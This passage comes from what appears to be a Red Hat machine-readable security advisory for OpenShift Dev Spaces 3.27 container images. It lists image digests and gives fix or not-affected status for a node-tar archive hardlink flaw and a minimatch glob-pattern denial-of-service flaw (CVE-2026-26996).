"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
